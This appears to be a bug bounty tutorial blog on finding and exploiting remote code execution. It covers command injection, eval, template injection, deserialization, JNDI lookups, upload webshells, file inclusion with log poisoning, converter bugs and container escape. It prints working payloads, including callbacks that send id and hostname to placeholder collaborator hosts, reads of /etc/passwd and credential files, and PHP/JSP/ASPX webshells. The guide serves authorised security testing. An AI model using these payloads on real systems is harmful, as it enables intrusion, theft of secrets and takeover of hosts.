Yeah, skydiving is cool I guess but… have you ever landed an RCE vulnerability in the wild? The dopamine rush is enough to silence imposter syndrome for a week. If you would like to experience this god complex, keep reading.

I’m going to make this super easy and walk you through a bunch of common RCE pathways. I’ll explain how they work and how to detect them in the wild.

A short disclaimer: While this is an excellent introduction to make you aware of different RCE paths, it won’t give you everything you need to know. Think of it as a teaser—a list of things to note down for further research. You see, every section in this blog could be a book of its own; it’s a deep, dark rabbit hole.

In the wise words of Trinity: “Follow the white rabbit.” 🐇

Command injection in OS exec sinks

Any time the app builds a command string and hands it to a shell helper like system, exec, popen, shell_exec, Runtime.exec via sh -c, subprocess with shell=True, or Node’s child_process.exec, untrusted input can become part of the command line. Shells do far more than run a program. They expand variables, split words, interpret metacharacters, and run subshells. If your input lands in that string, you can often turn a harmless parameter into arbitrary commands.

How to detect it

Have access to the code? Find the sink first, then walk inputs backward.

If you have access to the codebase, grep it for the usual suspects. If the command is built with concatenation, interpolation, or formatting and any piece derives from HTTP params, headers, form fields, JSON, queue messages, or DB rows, mark it hot.

If you’re working on a blackbox engagement, pick any endpoint that accepts filenames, search terms, paths, archive names, or image operations. Nudge the parameter with separators and substitutions and watch for signs of execution.

Some common signals to watch:

  • Immediate output differences when you append ; id, | id, && id, or a newline %0a.
  • Time deltas when you inject ; sleep 5 or & ping -n 6 127.0.0.1 >NUL on Windows.
  • Out of band callbacks to a collaborator when you inject ; curl https://<token>.oast.site/$(id) or ; nslookup whoami.<token>.oast.site.
  • Error echoes that leak the command line, like grep: ; id: No such file or directory.

How to exploit it

Start with low noise, then escalate methodically. Tailor payloads based on context and system type. Here are some options based on the context you find yourself in.

Unquoted concatenation

  • Unix:; id or | id or && id
  • Windows CMD: & whoami or | whoami or && whoami

Inside double quotes

  • Break out of the double quotes, then inject: ls"; id;#
  • Use a command substitution that still runs in double quotes: "$(id)" to leak output into the response or into a file.

Inside single quotes

  • Break out then continue: ls'; id;#
  • If quotes are filtered but not metacharacters, try a newline %0a id or backticks `id` where applicable.

No whitespace allowed

If you find yourself in a situation where whitespace is not allowed, try these:

  • Use shell field separators: ${IFS}id or $IFS$id
  • Use brace tricks: {id,-a} for flags, or {cat,/etc/passwd}
  • Tabs %09 often bypass simple space filtering.

Filters on ; and |

  • Try \n newline, &&, ||, backticks `id`, $(id), or redirections like </dev/null id
  • Use arithmetic or process substitution where supported: $((1+1)), <(id) in bash contexts.

Blind confirmation

Most often, you’ll find yourself in a situation where you can execute commands, but you can’t see the output. In those cases, you’ll need to find a blind way to confirm RCE. Here are some options:

  • Timing: ; sleep 7
  • DNS: ; nslookup $(id).<token>.oast.site
  • HTTP: ; curl -m 3 https://<token>.oast.site/p/$(id)
  • Windows timing: & ping -n 7 127.0.0.1 >NUL
  • Windows OAST: & powershell -c "iwr https://<token>.oast.site/$(whoami)"

Pivot to real impact once confirmed

Typically, once you’ve confirmed the existence of an RCE vulnerability, you would report it. In rare cases where you need to escalate further (like for a CTF, or with explicit permission from the system owner), you might like to use variations on these impact-proving payloads.

  • File read via shell: ; cat /etc/passwd
  • Process info: ; ps aux | head
  • Environment scrape: ; env
  • Key dump candidates: ; ls -la ~/.ssh, ; ls -la /root/.aws 2>/dev/null
  • Callback with context: ; curl -s https://<token>.oast.site/$(id)_$(hostname)

Windows quirks that help

I tend to have more trouble exploiting Windows systems than Linux, because I’m less familiar with Powershell/cmd. Here are some tricks that help:

  • CMD separators: &, |, &&, ||
  • PowerShell inline: & powershell -NoP -W Hidden -c "iwr https://<token>.oast.site/$(whoami)"
  • Bypass spaces with environment variables: %SystemRoot%\System32\whoami.exe

Unsafe code evaluation in interpreters

What is it?

Any feature that treats user input as code instead of data. Classic offenders are eval and friends: Python eval or exec, PHP assert and the old preg_replace /e, Ruby eval, JavaScript eval and Function, Node’s vm with a loose context, and Lua load or loadstring. When a developer wires a “formula,” “rule,” or “expression” field into one of these, your string stops being a value and starts becoming instructions that the runtime will happily run.

How to detect it

Hunt the sink first, then prove the runtime is actually evaluating. If you’re doing a white box, grep for obvious calls: eval, exec, Function, vm.runInNewContext, assert, create_function, load, loadstring. Trace where their argument comes from. Anything sourced from HTTP params, JSON bodies, headers, DB fields, or queue messages is hot.

If you only have black box access, look for endpoints or features that accept “expressions,” “calculations,” “filters,” “rules,” “templates,” or “advanced search.” Probe with telltale expressions and watch the output or timing:

  • Check for arithmetic that should won’t work if it is a plain string: 1+1, 2**8, "a"*5
  • Use harmless timing or callback beacons:
    • Python: __import__('time').sleep(5)
    • Node: require('http').get('https://<token>.oast.site/p/'+process.pid)
    • PHP: print(get_current_user());

Errors are useful. Messages like ReferenceError: require is not defined, NameError: __import__, or unexpected token tell you an interpreter tried to parse your input. In this case, you’ll probably be able to achieve RCE with a bit more finesse.

General tricks for tougher filters

If quotes are restricted, try building strings at runtime:

  • JS: String.fromCharCode(47,101,116,99,47,112,97,115,115,119,100)
  • Python: __import__('builtins').__dict__['__im'+'port__']('os').system('id')

If certain tokens are blacklisted, split and join them:

  • JS: global['pro'+'cess'], this['construct'+'or']['construct'+'or'](...)
  • Python: getattr(__import__('os'),'sy'+'stem')('id')

For blind cases, prefer timing and OAST to avoid altering state:

  • Sleep, DNS, or HTTP callbacks that include id or hostname in the path

Quick bug bounty tip: Document the exact request and the confirming output or callback. Once you have a working primitive, you can often reapply the same expression to other endpoints on the same (or a similar) target to quickly find duplicate bugs.

Server side template injection

What is it?

Server side template injection (SSTI) happens when user-controlled input is treated as a template that the server evaluates. Instead of rendering a harmless value into HTML or a string, the engine parses your input as code or expressions. Common engines: Jinja2 and Mako in Python, Twig in PHP, ERB in Ruby, EJS and Pug in Node, and FreeMarker or Thymeleaf in Java. If your payload lands inside the template context or template string itself, you can often read files, reach dangerous objects, and escalate to code execution inside the app process.

How to detect it

Start by confirming that your input is being evaluated, then fingerprint the engine so you know what syntax to use.

Quick eval probes that should never change output if the input is plain text:

  • Jinja2, Twig, Pug: {{ 7*7 }} expecting 49
  • FreeMarker, Thymeleaf: ${7*7} expecting 49
  • ERB: <%= 7*7 %> expecting 49
  • EJS: <%= 7*7 %> expecting 49

If you receive an error instead of 49, that is still a positive signal: the engine tried to parse your input. Examine the error text for clues on how you might get it working.

Fingerprint the template engine by using engine-specific quirks:

  • Jinja2: {{ 7*'7' }} gives 7777777
  • Twig: {{ constant('PHP_VERSION') }} may print a version
  • FreeMarker: ${"freemarker.template.Version"?new()} yields a version object
  • ERB: <%= RUBY_VERSION %> yields Ruby version
  • Blind cases: use timing or OAST beacons inside expressions. Some examples:
    • Jinja2 timing: {{ cycler.__init__.__globals__.__builtins__.__import__('time').sleep(5) }}
    • Node EJS OAST: <%= require('http').get('https://<token>.oast.site/'+process.pid) %>
    • PHP Twig OAST if functions are exposed: {{ file_get_contents('https://<token>.oast.site/') }}

Insecure deserialization gadget chains

What is it?

Deserialization bugs happen when the server accepts a byte stream that claims to be an object, trusts it, and rebuilds that object graph in memory. If any class in that graph runs code during magic methods or transformers, your payload executes before business logic even starts. Nice 👌. This is the same shape across ecosystems: Java ObjectInputStream, PHP unserialize, Python pickle, Ruby Marshal, .NET BinaryFormatter, plus “JSON but actually objects” via Java Jackson default typing or YAML loaders. The win comes from a gadget chain already in the classpath or library set, not from uploading new code.

How to detect it

Look for places where opaque blobs round-trip between client and server: remember-me cookies, session stores, shopping carts and search filters are common culprits. In code, sinks are easy to spot. In black box tests, you can fingerprint by tossing tiny canaries and reading the resulting errors.

  • Java often surfaces as Base64 that starts with rO0AB which is AC ED 00 05 in hex, the Java serialization stream header. Errors like java.io.InvalidClassException or stack traces mentioning ObjectInputStream.readObject are a very good sign.
  • PHP serialized values look like O:8:"ClassName":..., or a:1:{...} for arrays. Errors include unserialize(): Error at offset or you see your injected property names reflected.
  • Python pickle frequently appears in Base64 starting with gAS or raw bytes beginning \x80\x04. Errors like pickle.UnpicklingError or AttributeError: Can't get attribute X on <module> confirm that you’re on the right path.
  • Ruby Marshal starts with bytes \x04\x08 (Base64 often BAg...) and errors like ArgumentError: marshal data too short.
  • .NET BinaryFormatter shows System.Runtime.Serialization.Formatters.Binary.ObjectReader in traces. ASP.NET ViewState is a different format but follows the same “object reconstruction” idea if MAC validation is bypassed.

If you don’t have access to the code, the best way to detect deserialization is to flip the target param or cookie to an invalid but well-formed blob for that ecosystem and watch for errors or latency. Examples: send rO0ABXNy to Java endpoints, O:4:"X":0:{} to PHP, gASVAAAAAA== to Python, BAg= to Ruby. If nothing crashes and your value still round-trips cleanly between requests, that’s a sign that it is just plain data, not objects.

JNDI and remote lookup abuse

What is it?

Java Naming and Directory Interface lets apps resolve a name like ldap://host/x into an object. If an attacker can influence that name, the target will reach out to your server and try to reconstruct whatever you return. Older JVMs could even load classes from your HTTP server. Newer ones still happily accept “objects” that trigger gadget code during reconstruction. Log4Shell was just one particularly easy way to turn a string inside a logger into a JNDI lookup that ran code.

How to detect it

You are hunting places where attacker-controlled strings can be interpreted by code that performs lookups or interpolates lookups into messages.

If you’ve got access to the code, search for InitialContext.lookup(...), DirContext.search, JndiTemplate.lookup, or anything that builds ldap://, rmi://, iiop://, dns: from user input. Also look for logging frameworks or templating features that support lookups inside strings (helllooooo Log4Shell).

If you don’t have access to the code, spray canaries into fields that are likely to be logged or resolved. Common culprits are headers like X-Api-Version, User-Agent, X-Forwarded-For, JSON keys and values, contact forms, and any “integration URL” fields.

One common callback canary is: ${jndi:ldap://<token>.oast.site/a} but variations include ${jndi:rmi://<token>.oast.site/a} or ${jndi:dns://<token>.oast.site/a} if you’re facing a network with strict egress rules.

A DNS or HTTP hit to your collaborator proves a lookup happened. Server errors that mention JNDI, NamingException, ldap, rmi, orObjectFactory are signs that it might be possible, with some finessing. Delays or timeouts can also be a giveaway.

If nothing fires on the obvious payload, try moving the canary to other fields that you know the app logs. For stubborn cases, use interpolation tricks that survive string filtering, then keep your first goal the same: prove the lookup with a clean OAST callback.

File upload to execution paths

What is it?

What could be more beautiful than uploading a file and watching the server just… execute it?

This exploitation technique is when you turn an upload feature into code execution by making the server save something you control in a place the interpreter will run, or by bending the server to treat your file as executable. Classic wins are direct script uploads to webroot, extension confusion that makes a non-script execute as a script, and config sidecars like .htaccess or .user.ini that switch the handler on.

How to detect it

First, we map the storage and the URL path first, then push the boundaries of extension and content.

Upload a benign .txt (or whatever extension is allowed) and see if the response reveals a public URL. If not, try predictable paths like /uploads/, /files/, /media/, check the response body, and watch network logs for a redirect to the asset. In many applications you’ll be able to determine the location of the uploaded file by using the applications features. For example, if you’re uploading a new profile picture, get the location of the profile picture by right clicking on the image in your profile and clicking “copy image location”.

Next, we test what extensions are accepted. Try .php, .pHp, .phtml, .phar, .shtml, .jsp, .jspx, .war, .asp, .aspx, .cer, .asa. If blocked, try double extensions shell.php.jpg, or trailing dots and spaces. Normalization is your friend here.

If the form insists on images, you can attempt content-type and magic-byte tricks:

  • Send Content-Type: image/jpeg with a .php filename.
  • Start the file with a valid JPEG or GIF header, then your payload. Many “image only” validators only peek at the header, so you can fool it by sticking an image header at the top of a PHP file.

How to exploit it

Start with the simplest route: make the server run a tiny, harmless proof under a server-side interpreter. If that fails, escalate to confusion or config hijack.

Sample uploads

PHP one-liner:

<?php echo shell_exec('id'); ?>

Save as p.php. Upload, then hit /uploads/p.php. For a blind proof, call your collaborator:

<?php file_get_contents('https://<token>.oast.site/'.get_current_user()); ?>

Here’s JSP one-liner:

<% out.print(new java.util.Scanner(
Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next()); %>

And an ASPX one-liner:

<%@ Page Language="C#" %><%
Response.Write(
new System.IO.StreamReader(
System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo{
FileName="cmd.exe",Arguments="/c whoami",RedirectStandardOutput=true,UseShellExecute=false
}).StandardOutput).ReadToEnd()
);
%>

Polyglots

A polyglot is a file that can be interpreted as valid in two or more formats. There are communities of people out there who build impressive polyglots just as a puzzle. But polyglots aren’t just puzzles, they can be used to bypass file upload filters.

Put a valid header, then PHP:

\xFF\xD8\xFF\xE0JFIF....<?php echo shell_exec('id'); ?>

Use .php as the file extension if you can, the polyglot might pass naive “must be an image” checks.

Uploading config files

Sometimes you can alter the way files are handled (like make them executable) by uploading config files. For example, you might upload a .htaccess file in Apache contexts where AllowOverride permits it, with the following line:

AddType application/x-httpd-php .jpg

Then upload 1.jpg containing <?php echo shell_exec('id'); ?> and navigate to it.

The same goes for .user.ini on PHP-FPM:

auto_prepend_file=/var/www/html/uploads/p.php

Upload that .user.ini, then upload p.php with your harmless command. Any PHP executed in that directory prepends your code. Nice 👌.

Filenames that are actually arguments

Wrappers around system tools sometimes splice the uploaded name into a command. When you control the name, try injecting commands into the filename such as x;id;.png and watch responses for anything abnormal. This is rare but I’ve seen it!

Bypassing extension filters

Try bypassing filters with the usual tricks like .pHp, .PhP3, trailing dots file.php. or spaces “file.php ” work nicely.

LFI, RFI, and log poisoning to code execution

What is it?

Local File Inclusion allows you to force the server to include a file that already exists on the box. Remote File Inclusion lets you make it fetch and include a file from your host. If the target runs a server-side interpreter like PHP, including attacker code means code execution. Even when you can only include local files, you can often poison something the app will read later, like web server logs or PHP session files, then include that poisoned file to run your payload. The usual sink looks like include($_GET['page']), require, render, or any wrapper that turns a path you control into code it executes.

How to detect it

Start by proving that you can influence the include path, then fingerprint the interpreter and filesystem layout.

Sinks are typically parameters named page, template, view, lang, file, include, theme, preview, load. On the attacking side, you can prove LFI with traversal:

If the server is running Linux, try injecting ?page=../../../../etc/passwd and look for root:x:0:0 in the response. If you’re running Windows, try ?page=../../../../Windows/win.ini and look for for 16-bit app support.

If the app appends .php or similar, try the classic breakouts. Old stacks sometimes accept a null byte terminator: ?page=../../../../etc/passwd%00. This is such an old trick that it rarely works in the wild anymore, except on very old systems.

Double URL encoding, dot-dot slashes with extra separators, or ....//....// are often required to bypass normalization.

Try using filter wrappers that return source safely: ?page=php://filter/convert.base64-encode/resource=index.php

With some luck, the app will return some base64. Decode the base64 to view the PHP files. You’ve just turned your black box into a white box 😏.

If URLs are accepted, check for RFI! Inject payloads like ?page=http://<yourhost>/p.txt and watch your server logs for a fetch. If execution happens, you will see the effects of your payloads.

Poisoning Log Files

The most common web server log file locations are:

  • Apache: /var/log/apache2/access.log, /var/log/httpd/access_log
  • Nginx: /var/log/nginx/access.log
  • PHP sessions: /var/lib/php/sessions/sess_<PHPSESSID> or distro variant
  • Proc env if FPM passes it through: /proc/self/environ

If you find LFI, you can sometimes make HTTP requests containing your desired code to execute so that they appear in the log files, and then use the LFI to execute the log file.

Parser exploits in image and document converters

What is it?

When an app processes uploads, it often hands your file to heavy parsers or helper tools like ImageMagick, GraphicsMagick, libvips, Ghostscript, ExifTool, ffmpeg, or LibreOffice headless. Many of these helper tools treat files as little programming languages (MVG, SVG, PostScript, PDF, DjVu) or invoke external delegates under the hood. If you can smuggle a scriptable format past extension checks, or if a delegate builds a shell command using your filename, your upload can execute code in the converter process.

How to detect it

First we need to confirm that there is a conversion step. Some specific methods:

  • Upload a valid image, request it back, and note if the server resizes, re-encodes, strips metadata, or generates thumbnails. Those are conversion hints.
  • Send mismatched extensions vs content to see if the backend sniffs real format. For example, a file named .jpg that actually begins with %PDF or PostScript %!PS.
  • Use formats with network-capable primitives to get an OAST callback. For example SVGs that reference a remote resource:
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
   <image href="https://<token>.oast.site/probe.svg" width="1" height="1"/>
</svg>

Or an ImageMagick MVG disguised as JPG that pulls a URL when rasterized:

push graphic-context
viewbox 0 0 1 1
fill 'url(https://<token>.oast.site/mvg)'
pop graphic-context
  • Look for error pages or logs that leak converter versions, delegate paths, or commands like gs -q -dSAFER ... or ffmpeg -i.

How to exploit it

There are so many different ways that this can be exploited, this one section of the blog could be a whole book, so for now I’ll just give you some terms for further research:

  • ImageMagick for image uploads
  • Ghostscript through PDF, PS or EPS
  • RCE through exif and metadata (rare!)
  • OpenOffice document conversion (under the good, these are just a bunch of XML files in a ZIP. often vulnerable to XXE, SSRF and even RCE)

Container RCE to host escape

What is it?

You start with code execution inside a container, then pivot to control the host or cluster. The usual bridges are mis-mounted sockets, overpowered capabilities, sloppy hostPath mounts, or in-cluster credentials that let you schedule a privileged pod. Your goal is to find a control surface that lives outside the container boundary and drive it. Let’s gooo! 👇

How to detect it

First, confirm you are containerized, then run a series of tests to see if there are any holes you can ride back to the host.

This command will test if you’re in a container: test -f /.dockerenv || grep -E 'docker|kubepods' /proc/1/cgroup

This will test if there are any Docker or CRI sockets around:
ls -l /var/run/docker.sock /run/containerd/containerd.sock /var/run/crio/crio.sock

This will test if any kubernetes service account creds are laying around. Cross your fingers before running it: ls /var/run/secrets/kubernetes.io/serviceaccount/ then cat .../token

Check to see if the host filesystem is mounted anywhere: ls -ld /host /rootfs /node /var/lib/docker /var/run and mount | grep -E '/host|/rootfs'

Any one of these positives is usually enough for a clean escape. Good luck!

Conclusion

I have a theory that RCE is more common than most hackers realize. Once you have a good flow, you start to build a sixth sense for places to try these various injections. Once you see how a plain string becomes a process, you start spotting the same shape everywhere: strings stitched into shells, expressions that are evaluated, templates that execute, objects that wake up and run code, files that the server treats like programs, lookups that resolve to your infrastructure, converters that are really interpreters, containers that have a bridge back to the host. The specific payloads change, the path does not.

If you take anything from this guide, make it the workflow:

  • Prove execution with the smallest possible signal, ideally out of band. Capture the exact request and the confirming evidence.
  • When you land one primitive, sweep the app for twins that share the same sink.
  • When you drop into a container, look for the rails that lead out.

You are not guessing, you are following the data until the runtime has no choice but to run it.

Use this on Bugcrowd targets with care. Keep proofs harmless and reversible, stick to id or a short callback, and write reports that show the chain clearly from input to impact. Do that consistently and you will land more real RCEs, ship cleaner evidence, and spend less time arguing severity and more time collecting the dopamine.

Happy hacking!